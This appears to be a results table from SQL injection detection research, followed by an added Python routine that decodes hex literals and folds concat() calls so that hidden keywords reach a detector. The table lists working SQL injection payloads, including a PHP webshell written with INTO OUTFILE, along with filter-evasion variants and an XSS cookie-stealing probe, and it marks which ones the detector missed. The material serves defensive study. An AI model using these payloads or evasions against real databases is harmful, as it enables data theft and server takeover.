Payload | Description | Detection results |
--- | --- | --- |
id = 1 union select 1,2,group_concat (table_name), 3 from information_schema.tables where table_schema = database() | Union select injections | Malicious |
id = 1′ and ascii(substr (database(),1,1)) > 114 | Boolean-based BLIND injections | Malicious |
id = 1′ and if (ascii(substr (database(),1,1)) > 114, sleep (3),null) | Time-based BLIND injections | Malicious |
id = 1′ union select 1,2,”<?php @eval ($_GET[‘string’])?>” into outfile xxx.php | Webshell | Malicious |
id = 1′^ (ascii (mid ((select (GROUP_CONCAT (TABLE_NAME))from (information_schema.TABLES)where (TABLE_SCHEMA = database())),1,1)) = 1) = ’1′ | Bypassing blacklist filters stripping SPACES | Malicious |
Set @a = concat (‘selec’,‘t from xxx’); prepare h from @a; execute @a; | Stacked SQL injections | Malicious |
Set @a = 0x73656c656374202a2066726f6d20787878;prepare h from @a;execute @a; | Stacked SQL injections and hexadecimal execution bypasses string filtering | Normal1 |
?id = −1 union select group_concat (`123`),2 from (select 123 union select from flag)a | Bypassing blacklist filters stripping OR | Malicious |
id = 1 unionunion selectselect 1,2,group_concat (table_name),3 from information_schema.tables where table_schema = database() | Double writing bypasses UNION and SELECT filtering | Malicious |
M!T!@MzIGF.@[email protected].@[email protected]@[email protected]@.zZXI!oKSksM!S!.k. = | Insert special characters “!, @, .” in base64 encoding to bypass string filtering | Normal1 |
Select and union and order by | Benign statements embedding potentially harmful words | Normal |
<script >alert (document.cookie);</script > | XSS | Normal1 |
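The hex-encoded and concat-split stacked payloads in the table keep the SQL keywords out of the literal request text, which is why string filtering does not see them. The following is an added example, not code from the source or its detector: a normalization pass that decodes MySQL hex literals and folds `concat()` of string literals before a check runs. `SQL_KEYWORDS` is a hypothetical stand-in for the real classifier, the function names are assumptions, and the concat sample is constructed with ASCII quotes.

```python
import re

# Hypothetical stand-in for a string/keyword-based detector (assumption).
SQL_KEYWORDS = re.compile(r"\b(select|union|insert|update|delete|drop)\b", re.I)

# MySQL hex literal with an even number of hex digits, e.g. 0x73656c...
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")
# concat('a','b',...) whose arguments are all plain string literals
CONCAT_CALL = re.compile(r"concat\s*\(\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)", re.I)

# Hex row copied from the table; concat row constructed from it with ASCII quotes.
HEX_ROW = "Set @a = 0x73656c656374202a2066726f6d20787878;prepare h from @a;execute @a;"
CONCAT_ROW = "Set @a = concat ('selec','t from xxx'); prepare h from @a; execute @a;"


def decode_hex_literals(sql: str) -> str:
    """Replace 0x... literals with the quoted text they encode, when printable ASCII."""
    def repl(match: re.Match) -> str:
        try:
            text = bytes.fromhex(match.group(1)).decode("ascii")
        except UnicodeDecodeError:
            return match.group(0)  # binary value, leave untouched
        return f"'{text}'" if text.isprintable() else match.group(0)
    return HEX_LITERAL.sub(repl, sql)


def fold_concat(sql: str) -> str:
    """Join concat() of string literals into the single literal it evaluates to."""
    def repl(match: re.Match) -> str:
        return "'" + "".join(re.findall(r"'([^']*)'", match.group(1))) + "'"
    return CONCAT_CALL.sub(repl, sql)


def normalize(sql: str) -> str:
    """Text the detector should see: hex literals decoded, then concat folded."""
    return fold_concat(decode_hex_literals(sql))


def flagged(sql: str) -> bool:
    """Run the stand-in keyword check on the normalized text."""
    return bool(SQL_KEYWORDS.search(normalize(sql)))


if __name__ == "__main__":
    for row in (HEX_ROW, CONCAT_ROW):
        print(bool(SQL_KEYWORDS.search(row)), flagged(row), normalize(row))
```

The normalized string is meant to be passed to the actual classifier alongside the raw input; the keyword regex here only makes the before/after difference visible and would also match the benign "Select and union and order by" row.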